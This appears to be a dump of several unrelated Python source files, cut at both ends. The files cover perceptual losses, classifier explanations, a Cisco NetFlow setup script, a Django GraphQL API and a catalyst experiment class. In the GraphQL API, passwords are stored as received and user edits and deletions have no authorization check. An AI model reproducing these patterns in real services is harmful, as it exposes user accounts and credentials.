        self.cos_dist = cos_dist
        if lambda_vgg > eps:
            self.vgg = VGGPerceptualLoss()
        if lambda_vggface > eps:
            self.vggface = VGGFacePerceptualLoss()

    def forward(self, input, target, eps=1e-8, use_vggface: bool = True, use_vgg=True, max_vgg_layer=4):
        """
        :param input: Batch in [-1, 1]
        :param target: Batch in [-1, 1]
        :param use_vggface: Include the VGG-Face term (if its weight is active)
        :param use_vgg: Include the ImageNet-VGG term (if its weight is active)
        :param max_vgg_layer: Number of VGG blocks for the ImageNet term
        :return: Scalar weighted loss tensor
        """
        # NOTE(review): cos_dist is only forwarded to the VGG-Face branch;
        # the plain VGG branch always uses its default L1 distance -
        # confirm this asymmetry is intentional.
        loss = 0.0
        if self.lambda_vgg > eps and use_vgg:
            loss = loss + self.lambda_vgg * self.vgg(input, target, max_layer=max_vgg_layer)
        if self.lambda_vggface > eps and use_vggface:
            loss = loss + self.lambda_vggface * self.vggface(input, target, cos_dist=self.cos_dist)
        return loss
|
<gh_stars>0
from .soc_algo import _SamplingAndOcclusionAlgo
from .lm import BiGRULanguageModel
from .train_lm import do_train_lm
import os, logging, torch, pickle
import json
logger = logging.getLogger(__name__)
class SamplingAndOcclusionExplain:
    """
    Driver for Sampling-and-Occlusion (SOC) explanations of a classifier.

    Wraps _SamplingAndOcclusionAlgo, lazily training/loading the BiGRU
    language model it needs, and provides word-level and hierarchical
    explanation entry points plus an explanation-regularization loss over
    a list of "neutral" words.
    """

    def __init__(self, model, configs, tokenizer, output_path, device, lm_dir=None, train_dataloader=None,
                 dev_dataloader=None, vocab=None):
        self.configs = configs
        self.model = model
        self.lm_dir = lm_dir
        self.train_dataloader = train_dataloader
        self.dev_dataloader = dev_dataloader
        self.vocab = vocab
        self.output_path = output_path
        self.device = device
        self.hiex = configs.hiex
        self.tokenizer = tokenizer
        # Loads (or trains, if absent) the language model used for sampling
        self.lm_model = self.detect_and_load_lm_model()
        self.algo = _SamplingAndOcclusionAlgo(model, tokenizer, self.lm_model, output_path, configs)
        self.use_padding_variant = configs.use_padding_variant
        try:
            # Hierarchical output is pickled (binary); word-level is text
            self.output_file = open(self.output_path, 'w' if not configs.hiex else 'wb')
        except FileNotFoundError:
            # NOTE(review): with output_file None, word_level_explanation_bert
            # will fail when it tries to write - confirm intended.
            self.output_file = None
        self.output_buffer = []
        # for explanation regularization
        self.neutral_words_file = configs.neutral_words_file
        self.neutral_words_ids = None
        self.neutral_words = None
        #self.debug = debug

    def detect_and_load_lm_model(self):
        # Look for a checkpoint named 'best*' in lm_dir; train one if missing.
        if not self.lm_dir:
            self.lm_dir = 'runs/lm/'
        if not os.path.isdir(self.lm_dir):
            os.mkdir(self.lm_dir)
        file_name = None
        for x in os.listdir(self.lm_dir):
            if x.startswith('best'):
                file_name = x
                break
        if not file_name:
            self.train_lm()
            for x in os.listdir(self.lm_dir):
                if x.startswith('best'):
                    file_name = x
                    break
        # NOTE(review): torch.load unpickles arbitrary objects - only load
        # trusted checkpoints.
        lm_model = torch.load(open(os.path.join(self.lm_dir, file_name), 'rb'))
        return lm_model

    def train_lm(self):
        # Train the BiGRU language model from scratch and save it to lm_dir
        logger.info('Missing pretrained LM. Now training')
        model = BiGRULanguageModel(self.configs, vocab=self.vocab, device=self.device).to(self.device)
        do_train_lm(model, lm_dir=self.lm_dir, lm_epochs=5,
                    train_iter=self.train_dataloader, dev_iter=self.dev_dataloader)

    def word_level_explanation_bert(self, input_ids, input_mask, segment_ids, label=None):
        # requires batch size is 1
        # get sequence length
        i = 0
        while i < input_ids.size(1) and input_ids[0,i] != 0: # pad
            i += 1
        inp_length = i
        # do not explain [CLS] and [SEP]
        spans, scores = [], []
        for i in range(1, inp_length-1, 1):
            # Attribute each single-token span independently
            span = (i, i)
            spans.append(span)
            if not self.use_padding_variant:
                score = self.algo.do_attribution(input_ids, input_mask, segment_ids, span, label)
            else:
                score = self.algo.do_attribution_pad_variant(input_ids, input_mask, segment_ids, span, label)
            scores.append(score)
        inp = input_ids.view(-1).cpu().numpy()
        s = self.algo.repr_result_region(inp, spans, scores)
        self.output_file.write(s + '\n')

    def hierarchical_explanation_bert(self, input_ids, input_mask, segment_ids, label=None):
        tab_info = self.algo.do_hierarchical_explanation(input_ids, input_mask, segment_ids, label)
        self.output_buffer.append(tab_info)
        # currently store a pkl after explaining each instance
        # (re-opens the file each time, rewriting the whole buffer)
        self.output_file = open(self.output_path, 'w' if not self.hiex else 'wb')
        print("Saving >> {} -> {}".format(self.output_buffer, self.output_file))
        pickle.dump(self.output_buffer, self.output_file)
        self.output_file.close()

    def _initialize_neutral_words(self):
        # Read one word per line (tab-separated, first column) and map each
        # to a single tokenizer vocab id; multi-piece words keep the longest
        # piece as their representative.
        f = open(self.neutral_words_file)
        neutral_words = []
        neutral_words_ids = set()
        for line in f.readlines():
            word = line.strip().split('\t')[0]
            canonical = self.tokenizer.tokenize(word)
            if len(canonical) > 1:
                canonical.sort(key=lambda x: -len(x))
                print(canonical)
                word = canonical[0]
            neutral_words.append(word)
            neutral_words_ids.add(self.tokenizer.vocab[word])
        self.neutral_words = neutral_words
        self.neutral_words_ids = neutral_words_ids
        assert neutral_words

    def compute_explanation_loss(self, input_ids_batch, input_mask_batch, segment_ids_batch, label_ids_batch,
                                 do_backprop=False):
        # Returns (sum of squared attribution scores for neutral words
        # scaled by reg_strength, count of scored words); (0., 0) if none.
        if self.neutral_words is None:
            self._initialize_neutral_words()
        batch_size = input_ids_batch.size(0)
        neutral_word_scores, cnt = [], 0
        for b in range(batch_size):
            input_ids, input_mask, segment_ids, label_ids = input_ids_batch[b], \
                                                            input_mask_batch[b], \
                                                            segment_ids_batch[b], \
                                                            label_ids_batch[b]
            nw_positions = []
            for i in range(len(input_ids)):
                word_id = input_ids[i].item()
                if word_id in self.neutral_words_ids:
                    nw_positions.append(i)
            # only generate explanations for neutral words
            for i in range(len(input_ids)):
                word_id = input_ids[i].item()
                if word_id in self.neutral_words_ids:
                    x_region = (i, i)
                    #score = self.algo.occlude_input_with_masks_and_run(input_ids, input_mask, segment_ids,
                    #                                                   [x_region], nb_region, label_ids,
                    #                                                   return_variable=True)
                    if not self.configs.use_padding_variant:
                        score = self.algo.do_attribution(input_ids, input_mask, segment_ids, x_region, label_ids,
                                                         return_variable=True, additional_mask=nw_positions)
                    else:
                        score = self.algo.do_attribution_pad_variant(input_ids, input_mask, segment_ids,
                                                                     x_region, label_ids, return_variable=True,
                                                                     additional_mask=nw_positions)
                    # Penalize any non-zero attribution on neutral words
                    score = self.configs.reg_strength * (score ** 2)
                    if do_backprop:
                        score.backward()
                    neutral_word_scores.append(score.item())
        if neutral_word_scores:
            return sum(neutral_word_scores), len(neutral_word_scores)
        else:
            return 0., 0
|
#!/usr/bin/env python3
#
# Copyright (c) 2018, Cisco and/or its affiliates
# All rights reserved.
#__maintainer__ = '<NAME>'
#__email__ = '<EMAIL>'
#__date__ = 'January 2019'
#__version__ = 1.0
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
# This script enable Netflow configuration for Encrypted Traffic Analytics Catalyst 9K.
# Limitations:
# 1. The script uses the predefined names for NetFlow record (fnf-eta-rec), exporter (fnf-eta-exp)
#    and monitor (fnf-eta-mon) unless they are specified from the CLI
# 2. Refer to the ETA Cisco Validated Design on cisco.com for enabling ETA on interfaces for different deployments
import sys
from argparse import ArgumentParser
from ncclient import manager
import xml.dom.minidom
import re
import logging
import checkversion
from xml.etree.ElementTree import XML
def configure_flow_record(netconf_handler, proc_recordname, proc_exportername, proc_exporter_ip, proc_exporter_port, proc_monitorname):
    '''
    Configure the NetFlow record, exporter and monitor needed for ETA on the
    device behind `netconf_handler`, via a single edit-config on the running
    datastore.

    Returns True when the device replies <ok/>, False otherwise.
    '''
    flow_record_payload = '''
    <config>
      <native xmlns="http://cisco.com/ns/yang/Cisco-IOS-XE-native">
        <flow>
          <record xmlns="http://cisco.com/ns/yang/Cisco-IOS-XE-flow">
            <name>{eta_record}</name>
            <description>For ETA</description>
            <collect>
              <counter>
                <bytes>
                  <long/>
                </bytes>
                <packets>
                  <long/>
                </packets>
              </counter>
              <timestamp>
                <absolute>
                  <first/>
                  <last/>
                </absolute>
              </timestamp>
            </collect>
            <match>
              <ipv4>
                <destination>
                  <address/>
                </destination>
                <protocol/>
                <source>
                  <address/>
                </source>
              </ipv4>
              <transport>
                <destination-port/>
                <source-port/>
              </transport>
            </match>
          </record>
          <exporter xmlns="http://cisco.com/ns/yang/Cisco-IOS-XE-flow">
            <name>{eta_exporter}</name>
            <description>For ETA</description>
            <destination>
              <ipdest>
                <ip>{eta_exporter_ip}</ip>
              </ipdest>
            </destination>
            <transport>
              <udp>{eta_exporter_port}</udp>
            </transport>
          </exporter>
          <monitor xmlns="http://cisco.com/ns/yang/Cisco-IOS-XE-flow">
            <name>{eta_monitor}</name>
            <description>For ETA</description>
            <cache>
              <timeout>
                <active>60</active>
              </timeout>
            </cache>
            <exporter>
              <name>{eta_exporter}</name>
            </exporter>
            <record>
              <type>{eta_record}</type>
            </record>
          </monitor>
        </flow>
      </native>
    </config>
    '''
    # Fill in the record/exporter/monitor names and exporter endpoint
    payload = flow_record_payload.format(eta_record=proc_recordname,
                                         eta_exporter=proc_exportername,
                                         eta_exporter_ip=proc_exporter_ip,
                                         eta_exporter_port=proc_exporter_port,
                                         eta_monitor=proc_monitorname)
    reply = xml.dom.minidom.parseString(str(netconf_handler.edit_config(payload, target='running')))
    pretty = reply.toprettyxml(indent=" ")
    print(pretty)
    # The device acknowledges a successful edit-config with an <ok/> element
    return "<ok/>" in pretty
if __name__ == '__main__':
    parser = ArgumentParser(description='Select options.')
    # Input parameters
    parser.add_argument('--host', type=str, required=True,
                        help="The device IP or DN")
    parser.add_argument('-u', '--username', type=str, default='cisco',
                        help="Go on, guess!")
    # NOTE(review): '<PASSWORD>' is a redacted placeholder default - supply
    # a real password on the command line.
    parser.add_argument('-p', '--password', type=str, default='<PASSWORD>',
                        help="Yep, this one too! ;-)")
    parser.add_argument('--port', type=int, default=830,
                        help="Specify this if you want a non-default port")
    parser.add_argument('--recordname', type=str, default='fnf-eta-rec',
                        help="Specify the NetFlow Record name for ETA")
    parser.add_argument('--exportername', type=str, default='fnf-eta-exp',
                        help="Specify the NetFlow exporter name for ETA")
    parser.add_argument('--exporterip', type=str, required=True,
                        help="Specify the NetFlow exporter IP")
    parser.add_argument('--exporterudpport', type=int, default=2055,
                        help="Specify the NetFlow UDP port number for ETA")
    parser.add_argument('--monitorname', type=str, default='fnf-eta-mon',
                        help="Specify the NetFlow Monitor name for ETA")
    args = parser.parse_args()
    # Open the NETCONF session to the switch
    m = manager.connect(host=args.host,
                        port=args.port,
                        username=args.username,
                        password=args.password,
                        device_params={'name':"iosxe"})
    #Step 1. Verify if switch has at least 16.9.1 image running on the box
    if checkversion.verify_sw_version(m, min_major_release=16, min_minor_release=9, min_version=1):
        print("Switch Image meets the required criteria. proceeding with the configuration")
    else:
        print("Switch not ready to configure the feature! Exiting the script")
        exit()
    #Step 2: Configure FlowRecord
    if configure_flow_record(m, args.recordname, args.exportername, args.exporterip, args.exporterudpport, args.monitorname):
        print("Configured")
    else:
        print("Something wrong with configuring NetFlow for ETA")
        exit()
    #
|
import graphene
from graphene_django import DjangoObjectType
from .models import User, Post
class UserType(DjangoObjectType):
    """GraphQL type exposing the User model (id, name, email only).

    The password field is deliberately excluded from the API surface.
    """
    class Meta:
        model = User
        fields = ("id", "name", "email")
class PostType(DjangoObjectType):
    """GraphQL type exposing the Post model, including its author relation."""
    class Meta:
        model = Post
        fields = ("id", "title", "content", "date_posted", "last_updated", "author")
class Query(graphene.ObjectType):
    """Root query type: list all users and all posts."""
    all_users = graphene.List(UserType)
    all_posts = graphene.List(PostType)
    def resolve_all_users(root, info):
        # Returns every User row; no pagination or filtering.
        return User.objects.all()
    def resolve_all_posts(root, info):
        # Returns every Post row; no pagination or filtering.
        return Post.objects.all()
class UserAddMutation(graphene.Mutation):
    """Mutation that creates a new User and returns it with a status string."""
    class Arguments:
        name = graphene.String(required=True)
        email = graphene.String(required=True)
        password = graphene.String(required=True)
    user = graphene.Field(UserType)
    ok = graphene.String()
    @classmethod
    def mutate(cls, root, info, name, email, password):
        """Create and persist a User from the mutation arguments."""
        # SECURITY NOTE(review): the password is stored exactly as received —
        # apparently in plain text. Confirm whether User.save() hashes it; if
        # not, hash with django.contrib.auth.hashers before persisting.
        user = User(name=name, email=email, password=password)
        user.save()
        return UserAddMutation(user=user, ok="Successfully added user!")
class UserEditMutation(graphene.Mutation):
    """Mutation that changes an existing user's password."""
    class Arguments:
        _id = graphene.String(required=True)
        password = graphene.String(required=True)
    user = graphene.Field(UserType)
    ok = graphene.String()
    @classmethod
    def mutate(cls, root, info, _id, password):
        """Look up the user by id and overwrite the password.

        Note: ``User.objects.get`` raises ``User.DoesNotExist`` for an unknown
        id, which graphene surfaces as a GraphQL error.
        """
        # SECURITY NOTE(review): password stored as given (no hashing visible
        # here) — confirm hashing happens elsewhere.
        user = User.objects.get(id=_id)
        user.password = password
        user.save()
        return UserEditMutation(user=user, ok="Successfully changed password")
class UserDeleteMutation(graphene.Mutation):
    """Mutation that deletes a user by id."""
    class Arguments:
        _id = graphene.String(required=True)
    user = graphene.Field(UserType)
    ok = graphene.String()
    @classmethod
    def mutate(cls, root, info, _id):
        """Delete the user; returns the (now unsaved) in-memory instance."""
        user = User.objects.get(id=_id)
        user.delete()
        return UserDeleteMutation(user=user, ok="Successfully deleted user!")
class PostAddMutation(graphene.Mutation):
    """Mutation that creates a new Post authored by an existing User."""
    class Arguments:
        title = graphene.String(required=True)
        content = graphene.String(required=True)
        author_id = graphene.String(required=True)
    post = graphene.Field(PostType)
    ok = graphene.String()
    @classmethod
    def mutate(cls, root, info, title, content, author_id):
        """Create a Post for ``author_id``; ``ok`` reports the outcome.

        Bug fix: the original checked ``author is None`` and returned a bare
        string, but ``QuerySet.get`` never returns None (it raises
        ``DoesNotExist``), and graphene mutations must return a mutation
        instance — so that branch was both unreachable and invalid.
        """
        try:
            author = User.objects.get(id=author_id)
        except User.DoesNotExist:
            # Report the failure through the mutation payload instead of a
            # raw string (which graphene cannot serialize).
            return PostAddMutation(post=None, ok=f"No author with id = {author_id} found!")
        post = Post(title=title, content=content, author=author)
        post.save()
        return PostAddMutation(post=post, ok="Successfully added post!")
class PostEditMutation(graphene.Mutation):
    """Mutation that updates a post's content and, optionally, its title."""
    class Arguments:
        post_id = graphene.String(required=True)
        title = graphene.String(required=False)
        content = graphene.String(required=True)
    post = graphene.Field(PostType)
    ok = graphene.String()
    @classmethod
    def mutate(cls, root, info, post_id, content, title=None):
        """Fetch the post by id, apply the edits, and persist them."""
        target = Post.objects.get(id=post_id)
        # Title is optional; only overwrite it when explicitly provided.
        if title is not None:
            target.title = title
        target.content = content
        target.save()
        return PostEditMutation(post=target, ok="Successfully edited post!")
class PostDeleteMutation(graphene.Mutation):
    """Mutation that deletes a post by id."""
    class Arguments:
        post_id = graphene.String(required=True)
    ok = graphene.String()
    @classmethod
    def mutate(cls, root, info, post_id):
        """Remove the post identified by ``post_id`` and report success."""
        doomed = Post.objects.get(id=post_id)
        doomed.delete()
        return PostDeleteMutation(ok="Successfully deleted post!")
class Mutation(graphene.ObjectType):
    """Root mutation type: CRUD entry points for users and posts."""
    # Api calls related to user management
    add_user = UserAddMutation.Field()
    edit_user = UserEditMutation.Field()
    delete_user = UserDeleteMutation.Field()
    # Api calls related to user post management
    add_post = PostAddMutation.Field()
    edit_post = PostEditMutation.Field()
    delete_post = PostDeleteMutation.Field()
# The executable schema consumed by graphene-django's GraphQL view.
schema = graphene.Schema(query=Query, mutation=Mutation)
|
# Repository: arjunshibu/catalyst
from typing import Any, Callable, Dict, List, Mapping, Union
from collections import OrderedDict
from copy import deepcopy
import torch
from torch import nn
from torch.utils.data import DataLoader
from catalyst.contrib.data.augmentor import Augmentor, AugmentorCompose
from catalyst.core.callback import Callback
from catalyst.core.experiment import IExperiment
from catalyst.experiments.functional import (
add_default_callbacks,
do_lr_linear_scaling,
get_model_parameters,
load_optimizer_from_checkpoint,
process_callbacks,
)
from catalyst.registry import (
CALLBACKS,
CRITERIONS,
MODELS,
OPTIMIZERS,
SCHEDULERS,
TRANSFORMS,
)
from catalyst.typing import Criterion, Model, Optimizer, Scheduler
from catalyst.utils.loaders import get_loaders_from_params
from catalyst.utils.misc import get_short_hash, get_utcnow_time, merge_dicts
class ConfigExperiment(IExperiment):
    """
    Experiment created from a configuration file.
    """
    # Per-stage config sections that may be overridden stage-by-stage.
    STAGE_KEYWORDS = [ # noqa: WPS115
        "criterion_params",
        "optimizer_params",
        "scheduler_params",
        "data_params",
        "transform_params",
        "stage_params",
        "callbacks_params",
    ]
    def __init__(self, config: Dict):
        """
        Args:
            config: dictionary with parameters
        """
        self._config: Dict = deepcopy(config)
        self._trial = None
        self._initial_seed: int = self._config.get("args", {}).get("seed", 42)
        self._verbose: bool = self._config.get("args", {}).get(
            "verbose", False
        )
        self._check_time: bool = self._config.get("args", {}).get(
            "timeit", False
        )
        self._check_run: bool = self._config.get("args", {}).get(
            "check", False
        )
        self._overfit: bool = self._config.get("args", {}).get(
            "overfit", False
        )
        self._prepare_logdir()
        # Fold "state_params" (legacy name), "stage_params" and CLI args into
        # a single stage_params section before expanding per-stage configs.
        self._config["stages"]["stage_params"] = merge_dicts(
            deepcopy(
                self._config["stages"].get("state_params", {})
            ), # saved for backward compatibility
            deepcopy(self._config["stages"].get("stage_params", {})),
            deepcopy(self._config.get("args", {})),
            {"logdir": self._logdir},
        )
        self.stages_config: Dict = self._get_stages_config(
            self._config["stages"]
        )
    def _get_logdir(self, config: Dict) -> str:
        """Generate a logdir name from the current UTC time and config hash."""
        timestamp = get_utcnow_time()
        config_hash = get_short_hash(config)
        logdir = f"{timestamp}.{config_hash}"
        return logdir
    def _prepare_logdir(self): # noqa: WPS112
        """Resolve ``self._logdir`` from args ``logdir``/``baselogdir`` (or None)."""
        exclude_tag = "none"
        logdir = self._config.get("args", {}).get("logdir", None)
        baselogdir = self._config.get("args", {}).get("baselogdir", None)
        if logdir is not None and logdir.lower() != exclude_tag:
            self._logdir = logdir
        elif baselogdir is not None and baselogdir.lower() != exclude_tag:
            logdir_postfix = self._get_logdir(self._config)
            self._logdir = f"{baselogdir}/{logdir_postfix}"
        else:
            self._logdir = None
    def _get_stages_config(self, stages_config: Dict):
        """Expand per-stage configs, merging stage-level defaults under each
        stage ("state_params" is honored as a legacy alias of "stage_params")."""
        stages_defaults = {}
        stages_config_out = OrderedDict()
        for key in self.STAGE_KEYWORDS:
            if key == "stage_params":
                # backward compatibility
                stages_defaults[key] = merge_dicts(
                    deepcopy(stages_config.get("state_params", {})),
                    deepcopy(stages_config.get(key, {})),
                )
            else:
                stages_defaults[key] = deepcopy(stages_config.get(key, {}))
        for stage in stages_config:
            # Skip the shared default sections; only real stage names remain.
            if (
                stage in self.STAGE_KEYWORDS
                or stage == "state_params"
                or stages_config.get(stage) is None
            ):
                continue
            stages_config_out[stage] = {}
            for key2 in self.STAGE_KEYWORDS:
                if key2 == "stage_params":
                    # backward compatibility
                    stages_config_out[stage][key2] = merge_dicts(
                        deepcopy(stages_defaults.get("state_params", {})),
                        deepcopy(stages_defaults.get(key2, {})),
                        deepcopy(stages_config[stage].get("state_params", {})),
                        deepcopy(stages_config[stage].get(key2, {})),
                    )
                else:
                    stages_config_out[stage][key2] = merge_dicts(
                        deepcopy(stages_defaults.get(key2, {})),
                        deepcopy(stages_config[stage].get(key2, {})),
                    )
        return stages_config_out
    @property
    def initial_seed(self) -> int:
        """Experiment's initial seed value."""
        return self._initial_seed
    @property
    def logdir(self):
        """Path to the directory where the experiment logs."""
        return self._logdir
    @property
    def hparams(self) -> OrderedDict:
        """Returns hyperparameters"""
        return OrderedDict(self._config)
    @property
    def trial(self) -> Any:
        """
        Returns hyperparameter trial for current experiment.
        Could be useful for Optuna/HyperOpt/Ray.tune
        hyperparameters optimizers.
        Returns:
            trial
        Example::
            >>> experiment.trial
            optuna.trial._trial.Trial # Optuna variant
        """
        return self._trial
    @property
    def distributed_params(self) -> Dict:
        """Dict with the parameters for distributed and FP16 method."""
        return self._config.get("distributed_params", {})
    @property
    def stages(self) -> List[str]:
        """Experiment's stage names."""
        stages_keys = list(self.stages_config.keys())
        return stages_keys
    def get_stage_params(self, stage: str) -> Mapping[str, Any]:
        """Returns the state parameters for a given stage."""
        return self.stages_config[stage].get("stage_params", {})
    @staticmethod
    def _get_model(**params):
        """Build a model from registry params; "_key_value" yields an nn.ModuleDict."""
        key_value_flag = params.pop("_key_value", False)
        if key_value_flag:
            model = {}
            for model_key, model_params in params.items():
                model[model_key] = ConfigExperiment._get_model( # noqa: WPS437
                    **model_params
                )
            model = nn.ModuleDict(model)
        else:
            model = MODELS.get_from_params(**params)
        return model
    def get_model(self, stage: str):
        """Returns the model for a given stage."""
        model_params = self._config["model_params"]
        model = self._get_model(**model_params)
        return model
    @staticmethod
    def _get_criterion(**params):
        """Build a criterion (or dict of criteria); moved to CUDA when available."""
        key_value_flag = params.pop("_key_value", False)
        if key_value_flag:
            criterion = {}
            for key, key_params in params.items():
                criterion[
                    key
                ] = ConfigExperiment._get_criterion( # noqa: WPS437
                    **key_params
                )
        else:
            criterion = CRITERIONS.get_from_params(**params)
            if criterion is not None and torch.cuda.is_available():
                criterion = criterion.cuda()
        return criterion
    def get_criterion(self, stage: str) -> Criterion:
        """Returns the criterion for a given stage."""
        criterion_params = self.stages_config[stage].get(
            "criterion_params", {}
        )
        criterion = self._get_criterion(**criterion_params)
        return criterion
    def _get_optimizer(
        self, stage: str, model: Union[Model, Dict[str, Model]], **params
    ) -> Optimizer:
        """Instantiate one optimizer: optional LR linear scaling, layer-wise
        parameter groups, and warm start from the previous stage's checkpoint."""
        # @TODO 1: refactoring; this method is too long
        # @TODO 2: load state dicts for schedulers & criterion
        # lr linear scaling
        lr_scaling_params = params.pop("lr_linear_scaling", None)
        if lr_scaling_params:
            data_params = dict(self.stages_config[stage]["data_params"])
            batch_size = data_params.get("batch_size")
            per_gpu_scaling = data_params.get("per_gpu_scaling", False)
            lr, lr_scaling = do_lr_linear_scaling(
                lr_scaling_params=lr_scaling_params,
                batch_size=batch_size,
                per_gpu_scaling=per_gpu_scaling,
            )
            params["lr"] = lr
        else:
            lr_scaling = 1.0
        # getting layer-wise parameters
        layerwise_params = params.pop("layerwise_params", OrderedDict())
        no_bias_weight_decay = params.pop("no_bias_weight_decay", True)
        # getting model parameters
        model_key = params.pop("_model", None)
        model_params = get_model_parameters(
            models=model,
            models_keys=model_key,
            layerwise_params=layerwise_params,
            no_bias_weight_decay=no_bias_weight_decay,
            lr_scaling=lr_scaling,
        )
        # getting load-from-previous-stage flag
        load_from_previous_stage = params.pop(
            "load_from_previous_stage", False
        )
        # instantiate optimizer
        optimizer_key = params.pop("optimizer_key", None)
        optimizer = OPTIMIZERS.get_from_params(**params, params=model_params)
        # load from previous stage
        if load_from_previous_stage and self.stages.index(stage) != 0:
            checkpoint_path = f"{self.logdir}/checkpoints/best_full.pth"
            optimizer = load_optimizer_from_checkpoint(
                optimizer,
                checkpoint_path=checkpoint_path,
                checkpoint_optimizer_key=optimizer_key,
                model_parameters=model_params,
                optimizer_params=params,
            )
        return optimizer
    def get_optimizer(
        self, stage: str, model: Union[Model, Dict[str, Model]]
    ) -> Union[Optimizer, Dict[str, Optimizer]]:
        """
        Returns the optimizer for a given stage.
        Args:
            stage: stage name
            model (Union[Model, Dict[str, Model]]): model or a dict of models
        Returns:
            optimizer for selected stage
        """
        optimizer_params = self.stages_config[stage].get(
            "optimizer_params", {}
        )
        key_value_flag = optimizer_params.pop("_key_value", False)
        if key_value_flag:
            optimizer = {}
            for key, params in optimizer_params.items():
                # load specified optimizer from checkpoint
                optimizer_key = "optimizer_key"
                assert optimizer_key not in params, "keyword reserved"
                params[optimizer_key] = key
                optimizer[key] = self._get_optimizer(stage, model, **params)
        else:
            optimizer = self._get_optimizer(stage, model, **optimizer_params)
        return optimizer
    @staticmethod
    def _get_scheduler(
        *, optimizer: Union[Optimizer, Dict[str, Optimizer]], **params: Any
    ) -> Union[Scheduler, Dict[str, Scheduler]]:
        """Build a scheduler; "_optimizer" selects one optimizer from a dict."""
        optimizer_key = params.pop("_optimizer", None)
        optimizer = optimizer[optimizer_key] if optimizer_key else optimizer
        scheduler = SCHEDULERS.get_from_params(**params, optimizer=optimizer)
        return scheduler
    def get_scheduler(
        self, stage: str, optimizer: Union[Optimizer, Dict[str, Optimizer]]
    ) -> Union[Scheduler, Dict[str, Scheduler]]:
        """Returns the scheduler for a given stage."""
        params = self.stages_config[stage].get("scheduler_params", {})
        key_value_flag = params.pop("_key_value", False)
        if key_value_flag:
            scheduler: Dict[str, Scheduler] = {}
            for key, scheduler_params in params.items():
                scheduler[key] = self._get_scheduler(
                    optimizer=optimizer, **scheduler_params
                )
        else:
            scheduler = self._get_scheduler(optimizer=optimizer, **params)
        return scheduler
    @staticmethod
    def _get_transform(**params) -> Callable:
        """Build a transform; "_key_value" composes per-key Augmentors."""
        key_value_flag = params.pop("_key_value", False)
        if key_value_flag:
            transforms_composition = {
                transform_key: ConfigExperiment._get_transform( # noqa: WPS437
                    **transform_params
                )
                for transform_key, transform_params in params.items()
            }
            transform = AugmentorCompose(
                {
                    key: Augmentor(
                        dict_key=key,
                        augment_fn=transform,
                        input_key=key,
                        output_key=key,
                    )
                    for key, transform in transforms_composition.items()
                }
            )
        else:
            if "transforms" in params:
                # Recursively build nested transforms before the registry call.
                transforms_composition = [
                    ConfigExperiment._get_transform( # noqa: WPS437
                        **transform_params
                    )
                    for transform_params in params["transforms"]
                ]
                params.update(transforms=transforms_composition)
            transform = TRANSFORMS.get_from_params(**params)
        return transform
    def get_transforms(
        self, stage: str = None, dataset: str = None
    ) -> Callable:
        """
        Returns transform for a given stage and dataset.
        Args:
            stage: stage name
            dataset: dataset name (e.g. "train", "valid"),
                will be used only if the value of ``_key_value`` is ``True``
        Returns:
            Callable: transform function
        """
        transform_params = deepcopy(
            self.stages_config[stage].get("transform_params", {})
        )
        key_value_flag = transform_params.pop("_key_value", False)
        if key_value_flag:
            transform_params = transform_params.get(dataset, {})
        transform_fn = self._get_transform(**transform_params)
        if transform_fn is None:
            # No transform configured: identity over the sample dict.
            def transform_fn(dict_): # noqa: WPS440
                return dict_
        elif not isinstance(transform_fn, AugmentorCompose):
            transform_fn_origin = transform_fn
            # Adapt a plain callable to the dict-unpacking interface.
            def transform_fn(dict_): # noqa: WPS440
                return transform_fn_origin(**dict_)
        return transform_fn
    def get_loaders(
        self, stage: str, epoch: int = None,
    ) -> "OrderedDict[str, DataLoader]":
        """Returns the loaders for a given stage."""
        data_params = dict(self.stages_config[stage]["data_params"])
        loaders = get_loaders_from_params(
            get_datasets_fn=self.get_datasets,
            initial_seed=self.initial_seed,
            stage=stage,
            **data_params,
        )
        return loaders
    @staticmethod
    def _get_callback(**params):
        """Build a callback; "_wrapper" params recursively wrap the base callback."""
        wrapper_params = params.pop("_wrapper", None)
        callback = CALLBACKS.get_from_params(**params)
        if wrapper_params is not None:
            wrapper_params["base_callback"] = callback
            callback = ConfigExperiment._get_callback( # noqa: WPS437
                **wrapper_params
            )
        return callback
    def get_callbacks(self, stage: str) -> "OrderedDict[Callback]":
        """Returns the callbacks for a given stage."""
        callbacks_params = self.stages_config[stage].get(
            "callbacks_params", {}
        )
        callbacks = OrderedDict()
        for key, callback_params in callbacks_params.items():
            callback = self._get_callback(**callback_params)
            callbacks[key] = callback
        callbacks = add_default_callbacks(
            callbacks,
            verbose=self._verbose,
            check_time=self._check_time,
            check_run=self._check_run,
            overfit=self._overfit,
            is_infer=stage.startswith("infer"),
            is_logger=self.logdir is not None,
            is_criterion=self.stages_config[stage].get("criterion_params", {}),
            is_optimizer=self.stages_config[stage].get("optimizer_params", {}),
            is_scheduler=self.stages_config[stage].get("scheduler_params", {}),
        )
        # NOTE: stage should be in self._config.stages
        # otherwise will be raised ValueError
        stage_index = list(self.stages_config.keys()).index(stage)
        process_callbacks(callbacks, stage_index)
        return callbacks
__all__ = ["ConfigExperiment"]
|
import numpy as np
import matplotlib.pyplot as plt
import h5py
import torch
import os
from klampt.model.trajectory import Trajectory
from klampt.io.loader import save
from pdb import set_trace
def plot_pushing_error(bg, max_horiz=100):
    """Plot multi-step prediction RMSE of the learned pushing model against a
